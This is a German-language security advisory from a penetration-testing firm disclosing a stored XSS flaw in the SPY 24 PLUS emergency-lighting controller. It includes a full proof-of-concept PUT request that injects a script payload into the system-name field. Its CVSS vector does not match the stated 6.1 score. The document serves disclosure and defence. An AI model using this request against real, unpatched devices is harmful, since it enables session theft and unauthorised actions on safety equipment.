
Im Rahmen einer Prüfung hat das Penetrationstest-Team der Mint Secure GmbH eine Stored-XSS-Schwachstelle (Cross-Site Scripting) in der Lösung „SPY 24 PLUS“ (Version: 1.0.11) des Anbieters Linergy S.r.l. (Italien) entdeckt.
Zum Produkt:
Auf der Website des Anbieters
heißt es: „Spy Center 24 Plus ist ein SELV-System (Extra-Low-Voltage) mit Steuerung für Notbeleuchtungsanlagen mit zentral batteriebetriebenen LED-Leuchten bei 24 V DC.“ Möglicherweise sind auch andere Produkte dieses Anbieters betroffen, sofern sie denselben Webserver bzw. dieselbe Webanwendung verwenden.
Details zur Sicherheitslücke: Authentifizierte Benutzer können den Namen des Systems ändern, wobei der Wert in der Datenbank gespeichert wird. Dieser Wert wird auf jeder Seite ausgegeben, was dazu führt, dass die Payload (HTML oder JavaScript) beim Laden der Seite ausgeführt wird.


Zum Zeitpunkt der Veröffentlichung ist vom Anbieter kein Patch oder Workaround verfügbar. Wir werden diesen Artikel aktualisieren, sobald ein Patch oder Workaround verfügbar ist.
Details zur Sicherheitslücke und Proof-of-Concept
Um das XSS einzuschleusen, muss die folgende Anfrage ausgeführt werden:
PUT /spy24_db/sistema?pippo=ciao?statusCode=%5Bobject%20Object%5D HTTP/1.1
Host: [IP]:5984
Content-Length: 531
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Origin: http://[IP]
Referer: http://[IP]/
Accept-Encoding: gzip, deflate, br
Cookie: AuthSession=dXNlc[...]m6HnOoHGkUg7QWg
Connection: keep-alive
{"_id":"sistema","_rev":"37759-5c95b0c85cc0bafaa04228119729212e",
"Nome":""><script>alert(1)</script>",
"statoU9":0,
"rispostaU9":1,"I1":0,"I2":0,
[...] }
Dies ist die Anfrage in Burp Suite:

Wenn der Nome oben genannte Wert gespeichert wird und die Webanwendung den Systemnamen ohne ordnungsgemäße HTML-Kodierung oder Bereinigung ausgibt, wird die <script>alert(1)</script> Payload wird im Browser jedes Benutzers ausgeführt, der die Seite lädt.
Ein harmloser Proof-of-Concept, der vom Melder verwendet wurde, war die "><script>alert(1)</script> in dem Nome Feld gespeichert wurde; dies demonstriert die Ausführung im Browser des Opfers, als die Seite den nicht maskierten Namen lud. (Sensible Host-Angaben wurden hier unkenntlich gemacht; fügen Sie bei Bedarf umgebungsspezifische Angaben für interne Berichte hinzu.)
Mint Secure GmbH, Penetrationstest-Team
Art der Schwachstelle
- CWE-79: Unsachgemäße Neutralisierung von Eingaben bei der Erstellung von Webseiten (Cross-Site-Scripting)
Auswirkung
- Vertraulichkeit: Hoch – Durch die Ausführung von JavaScript können Sitzungstoken oder andere sensible Daten, auf die der Browser Zugriff hat, abgezogen werden.
- Integrität: Hoch – Ein bösartiges Skript kann im Namen des Opfers Aktionen ausführen (CSRF-ähnliche Aktionen unter Nutzung der Sitzung des Benutzers).
- Verfügbarkeit: Gering – XSS führt in der Regel nicht direkt zu einem Dienstausfall, kann jedoch mit anderen Angriffen kombiniert werden, um Störungen zu verursachen.
Angriffsvektor und Voraussetzungen
- Angriffsvektor: Netzwerk (HTTP) – Der Angreifer sendet die Nutzlast über die Weboberfläche der Anwendung.
- Erforderliche Berechtigungen: Gering (authentifizierter Benutzer). Ein Konto bei der Webanwendung des Geräts ist erforderlich, um den bösartigen Wert einzuspielen.
- Benutzerinteraktion: Erforderlich – die gespeicherte Nutzlast wird ausgeführt, wenn ein anderer Benutzer (oder derselbe Benutzer in einem anderen Kontext) Seiten lädt, die den gespeicherten
Nome/system-Namen anzeigen. - Umfang: Unverändert.
Vorgeschlagener CVSS v3.1-Basiswert (empfohlen)
- Vektor:
AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N - Ungefährer Basiswert: 6,1 (mittel)
- Begründung: Die Sicherheitslücke kann aus der Ferne über das Netzwerk ausgenutzt werden, erfordert jedoch eine Authentifizierung (PR:L) und dass ein Benutzer die betroffene Seite lädt (UI:R). Eine erfolgreiche Ausnutzung hat erhebliche Auswirkungen auf Vertraulichkeit und Integrität, beeinträchtigt jedoch nicht direkt die Verfügbarkeit.
So kann Mint Secure helfen
Bei unseren Penetrationstests werden häufig solche „Stored XSS“-Schwachstellen in Web-Oberflächen zur Geräteverwaltung entdeckt. Wir unterstützen Anbieter und Betreiber mit folgenden Dienstleistungen:
Penetrationstests für Webanwendungen
Wir testen Webanwendungen und Geräteschnittstellen auf XSS, Injektionsfehler und andere Schwachstellen der OWASP Top 10.
Koordinierte Offenlegung von Schwachstellen
Wir koordinieren in Ihrem Auftrag die verantwortungsvolle Offenlegung mit Anbietern, nationalen CERTs und CVE-Nummerierungsstellen.
Beratung zur sicheren Entwicklung
Wir beraten Entwicklungsteams zu den Themen Eingabesanitisierung, Ausgabekodierung und sicheren Programmierpraktiken, um XSS bereits bei der Entwicklung zu verhindern.
Zusammenfassung
CVE-2025-65348 ist eine gespeicherte XSS-Sicherheitslücke (CWE-79) in Linergys SPY 24 PLUS (v1.0.11) mit einem empfohlenen CVSS v3.1-Basiswert von 6,1 (mittel). Ein authentifizierter Benutzer kann über das Feld „Systemname“ eine persistente Skript-Payload einschleusen, die dann im Browser jedes Benutzers ausgeführt wird, der eine Seite aufruft, auf der dieser Name angezeigt wird.
Zum Zeitpunkt der Veröffentlichung ist vom Hersteller noch kein Patch oder Workaround verfügbar. Betreiber betroffener Geräte sollten den Administratorzugriff einschränken und das Feld „Systemname“ auf unerwartete Änderungen überwachen, bis ein Fix veröffentlicht wird.
Mint Secure unterstützt Hersteller und Betreiber mit Penetrationstests und koordinierter Offenlegung von Sicherheitslücken.
Nehmen Sie Kontakt mit uns auf.

